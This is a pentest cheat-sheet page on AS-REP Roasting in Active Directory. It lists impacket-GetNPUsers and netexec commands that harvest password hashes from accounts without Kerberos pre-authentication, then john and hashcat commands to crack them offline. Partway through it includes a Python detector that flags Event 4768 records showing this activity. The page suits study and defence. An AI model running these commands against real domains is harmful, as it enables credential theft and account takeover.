AS-REP Roasting

Last modified: 2024-02-18

Active Directory Windows

AS-REP Roasting is a technique that retrieves password hashes of Active Directory accounts for which Kerberos pre-authentication is not required.

Exploit

List users for which Kerberos pre-authentication is not required and retrieve their AS-REP hashes. Used for AS-REP Roasting.

impacket-GetNPUsers example.local/<username>
impacket-GetNPUsers -dc-ip <target-ip> example.local/ -no-pass -usersfile users.txt
impacket-GetNPUsers -dc-ip <target-ip> example.local/<username> -no-pass -format hashcat

# Without authentication
netexec ldap <target-ip> -u users.txt -p '' --asreproast output.txt
# With authentication
netexec ldap <target-ip> -u username -p password --asreproast output.txt
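A defender-side check for the activity the commands above generate, as an added example that is not from the original page: it scans Windows Security Event ID 4768 (TGT request) records, assumed here to be exported as key=value text with constructed sample lines inline, and flags successful requests with Pre-Authentication Type 0 and RC4 (0x17) ticket encryption, grouped by source address.

```python
"""Detection helper for AS-REP Roasting. Added example; the key=value export
format and the sample records below are constructed, not real log data."""
import re

# Constructed Security log records. PreAuthType 0 means no pre-authentication
# was used; TicketEncryptionType 0x17 is RC4-HMAC, the etype roasting tools
# request so the returned AS-REP is cheap to crack offline. 0x12 is AES256,
# which a normal Windows client negotiates even for pre-auth-disabled accounts.
SAMPLE_EVENTS = [
    "EventID=4768 TargetUserName=alice TargetDomainName=EXAMPLE.LOCAL IpAddress=10.0.0.5 PreAuthType=2 TicketEncryptionType=0x12 Status=0x0",
    "EventID=4768 TargetUserName=svc_backup TargetDomainName=EXAMPLE.LOCAL IpAddress=10.0.0.99 PreAuthType=0 TicketEncryptionType=0x17 Status=0x0",
    "EventID=4768 TargetUserName=svc_legacy TargetDomainName=EXAMPLE.LOCAL IpAddress=10.0.0.99 PreAuthType=0 TicketEncryptionType=0x17 Status=0x0",
    "EventID=4768 TargetUserName=bob TargetDomainName=EXAMPLE.LOCAL IpAddress=10.0.0.7 PreAuthType=0 TicketEncryptionType=0x12 Status=0x0",
    "EventID=4769 TargetUserName=alice TargetDomainName=EXAMPLE.LOCAL IpAddress=10.0.0.5 TicketEncryptionType=0x12 Status=0x0",
]

FIELD_RE = re.compile(r"(\w+)=(\S+)")


def parse_event(line):
    """Turn one key=value record into a dict."""
    return dict(FIELD_RE.findall(line))


def is_asrep_roast_candidate(event):
    """A successful TGT issued with no pre-auth and RC4 encryption is the
    signature of a roastable account being harvested. The AES case (bob) is
    left out on purpose to avoid flagging ordinary logons of such accounts."""
    return (
        event.get("EventID") == "4768"
        and event.get("Status") == "0x0"
        and event.get("PreAuthType") == "0"
        and event.get("TicketEncryptionType", "").lower() == "0x17"
    )


def find_asrep_roasting(lines):
    """Return {source IP: set of accounts} for suspicious requests. One host
    pulling AS-REPs for several pre-auth-disabled accounts is the pattern the
    GetNPUsers/netexec enumeration above produces."""
    by_source = {}
    for event in (parse_event(l) for l in lines):
        if is_asrep_roast_candidate(event):
            by_source.setdefault(event["IpAddress"], set()).add(event["TargetUserName"])
    return by_source


if __name__ == "__main__":
    for ip, users in find_asrep_roasting(SAMPLE_EVENTS).items():
        print(f"{ip} requested pre-auth-free RC4 AS-REPs for: {sorted(users)}")
```

Accounts that show up here are the ones to review for the "Do not require Kerberos preauthentication" setting, and the source address is the host to investigate.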

If we find a password hash, crack it.

john --format=krb5asrep --wordlist=wordlist.txt hash.txt
# or
hashcat -m 18200 -a 0 hash.txt wordlist.txt

We can also use it for a Pass-The-Hash attack.